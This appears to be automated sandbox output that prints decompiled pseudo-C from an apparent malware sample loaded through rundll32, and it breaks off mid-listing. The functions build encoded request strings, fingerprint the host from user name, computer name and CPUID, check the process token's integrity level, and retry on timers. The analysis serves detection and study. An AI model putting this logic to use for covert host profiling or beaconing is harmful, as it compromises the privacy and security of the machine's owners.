                                          • Instruction ID: 77b477bdd8a2ee7da7cda0fd20f8ff33631cd03c6450c21fa70d94f18b1f70f1
                                          • Opcode Fuzzy Hash: 57b863984d5de5b40ecdf1160ae6c248c52ff7e3269e9ee352704d8c1de5b585
                                          • Instruction Fuzzy Hash: C721D2B290021CBFEB019F95CD89EDEBFBDEB48740F108026FA40B6250D7759A449BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E047B1754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				void* _t68;
                                          				intOrPtr _t69;
                                          				int _t72;
                                          				void* _t73;
                                          				void* _t74;
                                          				void* _t76;
                                          				void* _t79;
                                          				intOrPtr _t83;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t95;
                                          				void* _t97;
                                          				intOrPtr _t104;
                                          				signed int _t108;
                                          				char** _t110;
                                          				int _t113;
                                          				intOrPtr* _t116;
                                          				intOrPtr* _t118;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t122;
                                          				intOrPtr _t125;
                                          				intOrPtr _t130;
                                          				int _t134;
                                          				CHAR* _t136;
                                          				intOrPtr _t137;
                                          				void* _t138;
                                          				void* _t147;
                                          				int _t148;
                                          				void* _t149;
                                          				intOrPtr _t150;
                                          				void* _t152;
                                          				long _t156;
                                          				intOrPtr* _t157;
                                          				intOrPtr* _t158;
                                          				intOrPtr* _t161;
                                          				void* _t162;
                                          				void* _t164;
                                          
                                          				_t147 = __edx;
                                          				_t138 = __ecx;
                                          				_t60 = __eax;
                                          				_v12 = 8;
                                          				if(__eax == 0) {
                                          					_t60 = GetTickCount();
                                          				}
                                          				_t61 =  *0x47bd018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t62 =  *0x47bd014; // 0x3a87c8cd
                                          				_t136 = _a16;
                                          				asm("bswap eax");
                                          				_t63 =  *0x47bd010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t64 =  *0x47bd00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t65 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t3 = _t65 + 0x47be633; // 0x74666f73
                                          				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x47bd02c,  *0x47bd004, _t60);
                                          				_t68 = E047B57AB();
                                          				_t69 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t4 = _t69 + 0x47be673; // 0x74707526
                                          				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                          				_t164 = _t162 + 0x38;
                                          				_t149 = _t148 + _t72; // executed
                                          				_t73 = E047B73E9(_t138); // executed
                                          				_t137 = __imp__;
                                          				_v8 = _t73;
                                          				if(_t73 != 0) {
                                          					_t130 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t7 = _t130 + 0x47be8cb; // 0x736e6426
                                          					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                          					_t164 = _t164 + 0xc;
                                          					_t149 = _t149 + _t134;
                                          					HeapFree( *0x47bd238, 0, _v8);
                                          				}
                                          				_t74 = E047B614A();
                                          				_v8 = _t74;
                                          				if(_t74 != 0) {
                                          					_t125 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t11 = _t125 + 0x47be8d3; // 0x6f687726
                                          					wsprintfA(_t149 + _a16, _t11, _t74);
                                          					_t164 = _t164 + 0xc;
                                          					HeapFree( *0x47bd238, 0, _v8);
                                          				}
                                          				_t150 =  *0x47bd324; // 0x6cb95b0
                                          				_t76 = E047B757B(0x47bd00a, _t150 + 4);
                                          				_t156 = 0;
                                          				_v20 = _t76;
                                          				if(_t76 == 0) {
                                          					L26:
                                          					HeapFree( *0x47bd238, _t156, _a16);
                                          					return _v12;
                                          				} else {
                                          					_t79 = RtlAllocateHeap( *0x47bd238, 0, 0x800);
                                          					_v8 = _t79;
                                          					if(_t79 == 0) {
                                          						L25:
                                          						HeapFree( *0x47bd238, _t156, _v20);
                                          						goto L26;
                                          					}
                                          					E047B749F(GetTickCount());
                                          					_t83 =  *0x47bd324; // 0x6cb95b0
                                          					__imp__(_t83 + 0x40);
                                          					asm("lock xadd [eax], ecx");
                                          					_t87 =  *0x47bd324; // 0x6cb95b0
                                          					__imp__(_t87 + 0x40);
                                          					_t89 =  *0x47bd324; // 0x6cb95b0
                                          					_t152 = E047B4D2C(1, _t147, _a16,  *_t89);
                                          					_v28 = _t152;
                                          					asm("lock xadd [eax], ecx");
                                          					if(_t152 == 0) {
                                          						L24:
                                          						HeapFree( *0x47bd238, _t156, _v8);
                                          						goto L25;
                                          					}
                                          					StrTrimA(_t152, 0x47bc294);
                                          					_t95 =  *0x47bd2a4; // 0x24fa5a8
                                          					_push(_t152);
                                          					_t18 = _t95 + 0x47be252; // 0x616d692f
                                          					_t97 = E047B9DEF(_t18);
                                          					_v16 = _t97;
                                          					if(_t97 == 0) {
                                          						L23:
                                          						HeapFree( *0x47bd238, _t156, _t152);
                                          						goto L24;
                                          					}
                                          					_t157 = __imp__;
                                          					 *_t157(_t152, _a4);
                                          					 *_t157(_v8, _v20);
                                          					_t158 = __imp__;
                                          					 *_t158(_v8, _v16);
                                          					 *_t158(_v8, _t152);
                                          					_t104 = E047BA5E9(0, _v8);
                                          					_a4 = _t104;
                                          					if(_t104 == 0) {
                                          						_v12 = 8;
                                          						L21:
                                          						E047B6106();
                                          						L22:
                                          						HeapFree( *0x47bd238, 0, _v16);
                                          						_t156 = 0;
                                          						goto L23;
                                          					}
                                          					_t108 = E047B2F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                          					_v12 = _t108;
                                          					if(_t108 == 0) {
                                          						_t161 = _v24;
                                          						_v12 = E047BA060(_t161, _a4, _a8, _a12);
                                          						_t116 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                          						_t118 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                          						_t120 =  *((intOrPtr*)(_t161 + 4));
                                          						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                          						_t122 =  *_t161;
                                          						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                          						E047B147E(_t161);
                                          					}
                                          					if(_v12 != 0x10d2) {
                                          						L16:
                                          						if(_v12 == 0) {
                                          							_t110 = _a8;
                                          							if(_t110 != 0) {
                                          								_t153 =  *_t110;
                                          								_t159 =  *_a12;
                                          								wcstombs( *_t110,  *_t110,  *_a12);
                                          								_t113 = E047B1600(_t153, _t153, _t159 >> 1);
                                          								_t152 = _v28;
                                          								 *_a12 = _t113;
                                          							}
                                          						}
                                          						goto L19;
                                          					} else {
                                          						if(_a8 != 0) {
                                          							L19:
                                          							E047B147E(_a4);
                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                          								goto L22;
                                          							} else {
                                          								goto L21;
                                          							}
                                          						}
                                          						_v12 = _v12 & 0x00000000;
                                          						goto L16;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 047B1768
                                          • wsprintfA.USER32 ref: 047B17B8
                                          • wsprintfA.USER32 ref: 047B17D5
                                          • wsprintfA.USER32 ref: 047B1801
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B1813
                                          • wsprintfA.USER32 ref: 047B1834
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B1844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047B1872
                                          • GetTickCount.KERNEL32 ref: 047B1883
                                          • RtlEnterCriticalSection.NTDLL(06CB9570), ref: 047B1897
                                          • RtlLeaveCriticalSection.NTDLL(06CB9570), ref: 047B18B5
                                            • Part of subcall function 047B4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,047B52FE,?,06CB95B0), ref: 047B4D57
                                            • Part of subcall function 047B4D2C: lstrlen.KERNEL32(?,?,?,047B52FE,?,06CB95B0), ref: 047B4D5F
                                            • Part of subcall function 047B4D2C: strcpy.NTDLL ref: 047B4D76
                                            • Part of subcall function 047B4D2C: lstrcat.KERNEL32(00000000,?), ref: 047B4D81
                                            • Part of subcall function 047B4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047B52FE,?,06CB95B0), ref: 047B4D9E
                                          • StrTrimA.SHLWAPI(00000000,047BC294,?,06CB95B0), ref: 047B18EC
                                            • Part of subcall function 047B9DEF: lstrlen.KERNEL32(?,00000000,00000000,047B5335,616D692F,00000000), ref: 047B9DFB
                                            • Part of subcall function 047B9DEF: lstrlen.KERNEL32(?), ref: 047B9E03
                                            • Part of subcall function 047B9DEF: lstrcpy.KERNEL32(00000000,?), ref: 047B9E1A
                                            • Part of subcall function 047B9DEF: lstrcat.KERNEL32(00000000,?), ref: 047B9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 047B1919
                                          • lstrcpy.KERNEL32(?,?), ref: 047B1921
                                          • lstrcat.KERNEL32(?,?), ref: 047B192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 047B1935
                                            • Part of subcall function 047BA5E9: lstrlen.KERNEL32(?,00000000,047BD330,00000001,047B937A,047BD00C,047BD00C,00000000,00000005,00000000,00000000,?,?,?,047B207E,?), ref: 047BA5F2
                                            • Part of subcall function 047BA5E9: mbstowcs.NTDLL ref: 047BA619
                                            • Part of subcall function 047BA5E9: memset.NTDLL ref: 047BA62B
                                          • wcstombs.NTDLL ref: 047B19C8
                                            • Part of subcall function 047BA060: SysAllocString.OLEAUT32(?), ref: 047BA09B
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 047B1A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 047B1A15
                                          • HeapFree.KERNEL32(00000000,?,?,06CB95B0), ref: 047B1A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B1A2D
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B1A39
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 3748877296-0
                                          • Opcode ID: 6627b6dbcbb2c4d06de5731b088fd027cadd0e156a831bfc39c473f900e1a6db
                                          • Instruction ID: 77063d6ba894f775a6f876e7393b20e0138accf984999d90b458ea8ae54ca75d
                                          • Opcode Fuzzy Hash: 6627b6dbcbb2c4d06de5731b088fd027cadd0e156a831bfc39c473f900e1a6db
                                          • Instruction Fuzzy Hash: DE912471900249AFDB21AFA4DD88FDA7BB9EF08354F148464F548E7260D738ED51DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 83%
                                          			E047B9B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				void _v48;
                                          				long _v52;
                                          				struct %anon52 _v60;
                                          				char _v72;
                                          				long _v76;
                                          				void* _v80;
                                          				union _LARGE_INTEGER _v84;
                                          				struct %anon52 _v92;
                                          				void* _v96;
                                          				void* _v100;
                                          				union _LARGE_INTEGER _v104;
                                          				long _v108;
                                          				intOrPtr _v120;
                                          				struct %anon52 _v128;
                                          				struct %anon52 _t46;
                                          				void* _t51;
                                          				long _t53;
                                          				void* _t54;
                                          				struct %anon52 _t60;
                                          				long _t64;
                                          				struct %anon52 _t65;
                                          				void* _t68;
                                          				void* _t72;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t78;
                                          				void** _t82;
                                          				signed int _t86;
                                          				void* _t89;
                                          
                                          				_t75 = __edx;
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                          				_v60 = _t46;
                                          				if(_t46 == 0) {
                                          					_v92.HighPart = GetLastError();
                                          				} else {
                                          					_push(0xffffffff);
                                          					_push(0xff676980);
                                          					_push(0);
                                          					_push( *0x47bd240);
                                          					_v76 = 0;
                                          					_v80 = 0;
                                          					L047BB088();
                                          					_v84.LowPart = _t46;
                                          					_v80 = _t75;
                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                          					_t51 =  *0x47bd26c; // 0x410
                                          					_v76 = _t51;
                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                          					_v108 = _t53;
                                          					if(_t53 == 0) {
                                          						if(_a8 != 0) {
                                          							L4:
                                          							 *0x47bd24c = 5;
                                          						} else {
                                          							_t68 = E047B68CF(); // executed
                                          							if(_t68 != 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          						_v104.LowPart = 0;
                                          						L6:
                                          						L6:
                                          						if(_v104.LowPart == 1 && ( *0x47bd260 & 0x00000001) == 0) {
                                          							_v104.LowPart = 2;
                                          						}
                                          						_t73 = _v104.LowPart;
                                          						_t58 = _t73 << 4;
                                          						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                          						_t74 = _t73 + 1;
                                          						_v92.LowPart = _t73 + 1;
                                          						_t60 = E047B9F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                          						_v128.LowPart = _t60;
                                          						if(_t60 != 0) {
                                          							goto L17;
                                          						}
                                          						_t65 = _v92;
                                          						_v104.LowPart = _t65;
                                          						_t97 = _t65 - 3;
                                          						if(_t65 != 3) {
                                          							goto L6;
                                          						} else {
                                          							_v120 = E047B54AC(_t74, _t97,  &_v72, _a4, _a8);
                                          						}
                                          						goto L12;
                                          						L17:
                                          						__eflags = _t60 - 0x10d2;
                                          						if(_t60 != 0x10d2) {
                                          							_push(0xffffffff);
                                          							_push(0xff676980);
                                          							_push(0);
                                          							_push( *0x47bd244);
                                          							goto L21;
                                          						} else {
                                          							__eflags =  *0x47bd248; // 0x0
                                          							if(__eflags == 0) {
                                          								goto L12;
                                          							} else {
                                          								_t60 = E047B6106();
                                          								_push(0xffffffff);
                                          								_push(0xdc3cba00);
                                          								_push(0);
                                          								_push( *0x47bd248);
                                          								L21:
                                          								L047BB088();
                                          								_v104.LowPart = _t60;
                                          								_v100 = _t78;
                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0);
                                          								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                          								_v128 = _t64;
                                          								__eflags = _t64;
                                          								if(_t64 == 0) {
                                          									goto L6;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							}
                                          						}
                                          						L25:
                                          					}
                                          					L12:
                                          					_t82 =  &_v72;
                                          					_t72 = 3;
                                          					do {
                                          						_t54 =  *_t82;
                                          						if(_t54 != 0) {
                                          							HeapFree( *0x47bd238, 0, _t54);
                                          						}
                                          						_t82 =  &(_t82[4]);
                                          						_t72 = _t72 - 1;
                                          					} while (_t72 != 0);
                                          					CloseHandle(_v80);
                                          				}
                                          				return _v92.HighPart;
                                          				goto L25;
                                          			}

































                                          APIs
                                          • memset.NTDLL ref: 047B9B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 047B9B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 047B9BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 047B9BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,047B4AC4,?), ref: 047B9BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,047B4AC4,?,00000000), ref: 047B9CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047B4AC4,?,00000000,?,?), ref: 047B9CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 047B9CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 047B9D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 047B9D10
                                            • Part of subcall function 047B68CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06CB9388,00000000,?,7519F710,00000000,7519F730), ref: 047B691E
                                            • Part of subcall function 047B68CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06CB93C0,?,00000000,30314549,00000014,004F0053,06CB937C), ref: 047B69BB
                                            • Part of subcall function 047B68CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047B9C10), ref: 047B69CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047B4AC4,?,00000000,?,?), ref: 047B9D23
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: d4d67236cbd36a7f1c6c277f422e6c0c892497c198e6f9e52ae340aac5961a7d
                                          • Instruction ID: 95f12d1836655364aeceb09b4bf6ae4c52e7d4c5174ee5936eb67beb4c289401
                                          • Opcode Fuzzy Hash: d4d67236cbd36a7f1c6c277f422e6c0c892497c198e6f9e52ae340aac5961a7d
                                          • Instruction Fuzzy Hash: 85516FF1408310AFD721AF259D48EEBBBE8EF85724F508A19FAA482250D774E504CFD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E047B1A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                          				intOrPtr _v8;
                                          				struct _FILETIME* _v12;
                                          				short _v56;
                                          				struct _FILETIME* _t12;
                                          				intOrPtr _t13;
                                          				void* _t17;
                                          				void* _t21;
                                          				intOrPtr _t27;
                                          				long _t28;
                                          				void* _t30;
                                          
                                          				_t27 = __edx;
                                          				_t12 =  &_v12;
                                          				GetSystemTimeAsFileTime(_t12);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v8);
                                          				_push(_v12);
                                          				L047BB082();
                                          				_push(_t12);
                                          				_v12 = _t12;
                                          				_t13 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t5 = _t13 + 0x47be836; // 0x6cb8dde
                                          				_t6 = _t13 + 0x47be59c; // 0x530025
                                          				_push(0x16);
                                          				_push( &_v56);
                                          				_v8 = _t27;
                                          				L047BAD1A();
                                          				_t17 = CreateFileMappingW(0xffffffff, 0x47bd2a8, 4, 0, 0x1000,  &_v56); // executed
                                          				_t30 = _t17;
                                          				if(_t30 == 0) {
                                          					_t28 = GetLastError();
                                          				} else {
                                          					if(GetLastError() == 0xb7) {
                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                          						if(_t21 == 0) {
                                          							_t28 = GetLastError();
                                          							if(_t28 != 0) {
                                          								goto L6;
                                          							}
                                          						} else {
                                          							 *_a4 = _t30;
                                          							 *_a8 = _t21;
                                          							_t28 = 0;
                                          						}
                                          					} else {
                                          						_t28 = 2;
                                          						L6:
                                          						CloseHandle(_t30);
                                          					}
                                          				}
                                          				return _t28;
                                          			}














                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,047B4996,?,?,4D283A53,?,?), ref: 047B1A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 047B1A70
                                          • _snwprintf.NTDLL ref: 047B1A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,047BD2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 047B1AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047B4996,?,?,4D283A53,?), ref: 047B1AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 047B1ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,047B4996,?,?,4D283A53), ref: 047B1AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047B4996,?,?,4D283A53,?), ref: 047B1B03
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 1cc18d6fd1dbb9abb983a67b22cd56b0df85a451299f5dc4352876c46a5adfa1
                                          • Instruction ID: 2ae46cbc5f97571fd3a3d1528c30f42adfd200c1f9eaa1044fb11edd1f0debb7
                                          • Opcode Fuzzy Hash: 1cc18d6fd1dbb9abb983a67b22cd56b0df85a451299f5dc4352876c46a5adfa1
                                          • Instruction Fuzzy Hash: 0021C076600604BFD722EBA8CD49FCA37B9EB44751F248125F645E7280E6B4EA04CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 139 47b93d5-47b93e9 140 47b93eb-47b93f0 139->140 141 47b93f3-47b9405 call 47b6f89 139->141 140->141 144 47b9459-47b9466 141->144 145 47b9407-47b9417 GetUserNameW 141->145 146 47b9468-47b947f GetComputerNameW 144->146 145->146 147 47b9419-47b9429 RtlAllocateHeap 145->147 148 47b94bd-47b94e1 146->148 149 47b9481-47b9492 RtlAllocateHeap 146->149 147->146 150 47b942b-47b9438 GetUserNameW 147->150 149->148 153 47b9494-47b949d GetComputerNameW 149->153 151 47b943a-47b9446 call 47b7cf7 150->151 152 47b9448-47b9457 HeapFree 150->152 151->152 152->146 155 47b949f-47b94ab call 47b7cf7 153->155 156 47b94ae-47b94b7 HeapFree 153->156 155->156 156->148
                                          C-Code - Quality: 96%
                                          			E047B93D5(char __eax, void* __esi) {
                                          				long _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v28;
                                          				long _t34;
                                          				signed int _t39;
                                          				long _t50;
                                          				char _t59;
                                          				intOrPtr _t61;
                                          				void* _t62;
                                          				void* _t64;
                                          				char _t65;
                                          				intOrPtr* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          
                                          				_t69 = __esi;
                                          				_t65 = __eax;
                                          				_v8 = 0;
                                          				_v12 = __eax;
                                          				if(__eax == 0) {
                                          					_t59 =  *0x47bd270; // 0xd448b889
                                          					_v12 = _t59;
                                          				}
                                          				_t64 = _t69;
                                          				E047B6F89( &_v12, _t64);
                                          				if(_t65 != 0) {
                                          					 *_t69 =  *_t69 ^  *0x47bd2a0 ^ 0x76f6612d;
                                          				} else {
                                          					GetUserNameW(0,  &_v8); // executed
                                          					_t50 = _v8;
                                          					if(_t50 != 0) {
                                          						_t62 = RtlAllocateHeap( *0x47bd238, 0, _t50 + _t50);
                                          						if(_t62 != 0) {
                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                          								_t64 = _t62;
                                          								 *_t69 =  *_t69 ^ E047B7CF7(_v8 + _v8, _t64);
                                          							}
                                          							HeapFree( *0x47bd238, 0, _t62);
                                          						}
                                          					}
                                          				}
                                          				_t61 = __imp__;
                                          				_v8 = _v8 & 0x00000000;
                                          				GetComputerNameW(0,  &_v8);
                                          				_t34 = _v8;
                                          				if(_t34 != 0) {
                                          					_t68 = RtlAllocateHeap( *0x47bd238, 0, _t34 + _t34);
                                          					if(_t68 != 0) {
                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                          							_t64 = _t68;
                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E047B7CF7(_v8 + _v8, _t64);
                                          						}
                                          						HeapFree( *0x47bd238, 0, _t68);
                                          					}
                                          				}
                                          				asm("cpuid");
                                          				_t67 =  &_v28;
                                          				 *_t67 = 1;
                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                          				 *(_t67 + 0xc) = _t64;
                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                          				return _t39;
                                          			}

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 047B940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047B9423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 047B9430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B9451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047B9478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047B948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047B9499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B94B7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 24311f16196054ba0a7ba3293037fbd45ba526d33a0aa8f92f1a6145af680dc7
                                          • Instruction ID: d5ab4aa7fa6285191222fe6efcbe1db9b7ef54ef274395d6594023f52160186a
                                          • Opcode Fuzzy Hash: 24311f16196054ba0a7ba3293037fbd45ba526d33a0aa8f92f1a6145af680dc7
                                          • Instruction Fuzzy Hash: 21311AB1A00209EFDB21DFA9DD80BEEB7F9EB44310F518469E654D7210D734EE059B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E047B53E3(long* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				long _v20;
                                          				int _t33;
                                          				void* _t46;
                                          
                                          				_v16 = 1;
                                          				_v20 = 0x2000;
                                          				if( *0x47bd25c > 5) {
                                          					_v16 = 0;
                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                          						_v8 = 0;
                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                          						if(_v8 != 0) {
                                          							_t46 = E047B58BE(_v8);
                                          							if(_t46 != 0) {
                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                          								if(_t33 != 0) {
                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                          								}
                                          								E047B147E(_t46);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				 *_a4 = _v20;
                                          				return _v16;
                                          			}

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 047B5415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 047B5435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 047B5445
                                          • CloseHandle.KERNEL32(00000000), ref: 047B5495
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
